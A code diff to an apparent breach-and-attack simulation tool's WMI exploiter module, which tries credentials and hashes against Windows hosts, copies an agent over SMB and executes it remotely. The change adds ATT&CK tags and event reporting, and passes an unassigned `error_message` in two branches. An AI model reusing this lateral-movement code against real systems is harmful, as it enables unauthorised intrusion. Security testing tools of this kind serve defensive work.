Agent: Add successful exploitation in WMI

monkey/infection_monkey/exploit/wmiexec.py

@@ -2,10 +2,16 @@ import logging
 import ntpath
 import socket
 import traceback
+from time import time
 
 from impacket.dcerpc.v5.rpcrt import DCERPCException
 
 from common.credentials import get_plaintext
+from common.tags import (
+    T1021_ATTACK_TECHNIQUE_TAG,
+    T1105_ATTACK_TECHNIQUE_TAG,
+    T1110_ATTACK_TECHNIQUE_TAG,
+)
 from infection_monkey.exploit.HostExploiter import HostExploiter
 from infection_monkey.exploit.tools.helpers import get_agent_dst_path
 from infection_monkey.exploit.tools.smb_tools import SmbTools
@@ -21,10 +27,15 @@ from infection_monkey.utils.threading import interruptible_iter
 
 logger = logging.getLogger(__name__)
 
+WMI_EXPLOITER_TAG = "wmi-exploiter"
+
 
 class WmiExploiter(HostExploiter):
     _EXPLOITED_SERVICE = "WMI (Windows Management Instrumentation)"
 
+    _EXPLOITER_TAGS = (WMI_EXPLOITER_TAG, T1021_ATTACK_TECHNIQUE_TAG, T1110_ATTACK_TECHNIQUE_TAG)
+    _PROPAGATION_TAGS = (WMI_EXPLOITER_TAG, T1105_ATTACK_TECHNIQUE_TAG)
+
     @WmiTools.impacket_user
     @WmiTools.dcom_wrap
     def _exploit_host(self) -> ExploiterResultData:
@@ -44,6 +55,7 @@ class WmiExploiter(HostExploiter):
 
             wmi_connection = WmiTools.WmiConnection()
 
+            timestamp = time()
             try:
                 wmi_connection.connect(
                     self.host,
@@ -55,26 +67,34 @@ class WmiExploiter(HostExploiter):
                 )
             except AccessDeniedException:
                 self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
-                logger.debug(f"Failed connecting to {self.host} using WMI")
+                error_message = f"Failed connecting to {self.host} using WMI"
+                logger.debug(error_message)
+                self._publish_exploitation_event(timestamp, False, error_message=error_message)
                 continue
             except DCERPCException:
                 self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
                 logger.debug(f"Failed connecting to {self.host} using WMI")
+                self._publish_exploitation_event(timestamp, False, error_message=error_message)
                 continue
 
             except socket.error:
-                logger.debug(f"Network error in WMI connection to {self.host}")
+                error_message = f"Network error in WMI connection to {self.host}"
+                logger.debug(error_message)
+                self._publish_exploitation_event(timestamp, False, error_message=error_message)
                 return self.exploit_result
 
             except Exception as exc:
-                logger.debug(
+                error_message = (
                     f"Unknown WMI connection error to {self.host}: "
                     f"{exc} {traceback.format_exc()}"
                 )
+                logger.debug(error_message)
+                self._publish_exploitation_event(timestamp, False, error_message=error_message)
                 return self.exploit_result
 
             self.report_login_attempt(True, user, password, lm_hash, ntlm_hash)
             self.exploit_result.exploitation_success = True
+            self._publish_exploitation_event(timestamp, True, error_message=error_message)
 
             downloaded_agent = self.agent_binary_repository.get_agent_binary(self.host.os["type"])
 
@@ -84,6 +104,7 @@ class WmiExploiter(HostExploiter):
 
             target_path = get_agent_dst_path(self.host)
 
+            propagation_timestamp = time()
             remote_full_path = SmbTools.copy_file(
                 self.host,
                 downloaded_agent,
@@ -119,27 +140,23 @@ class WmiExploiter(HostExploiter):
 
             if (0 != result.ProcessId) and (not result.ReturnValue):
                 logger.info(
-                    "Executed dropper '%s' on remote victim %r (pid=%d, cmdline=%r)",
+                    f"Executed dropper '{remote_full_path}' on remote victim {self.host} "
-                    remote_full_path,
+                    f"(pid={result.ProcessId}, cmdline={cmdline})"
-                    self.host,
-                    result.ProcessId,
-                    cmdline,
                 )
 
                 self.add_vuln_port(port="unknown")
                 self.exploit_result.propagation_success = True
+                self._publish_propagation_event(propagation_timestamp, True)
             else:
                 error_message = (
-                    "Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, "
+                    f"Error executing dropper '{remote_full_path}' on remote victim {self.host} "
-                    "cmdline=%r)",
+                    f"(pid={result.ProcessId}, exit_code={result.ReturnValue}, cmdline={cmdline})"
-                    remote_full_path,
-                    self.host,
-                    result.ProcessId,
-                    result.ReturnValue,
-                    cmdline,
                 )
                 logger.debug(error_message)
                 self.exploit_result.error_message = error_message
+                self._publish_propagation_event(
+                    propagation_timestamp, False, error_message=error_message
+                )
 
             result.RemRelease()
             wmi_connection.close()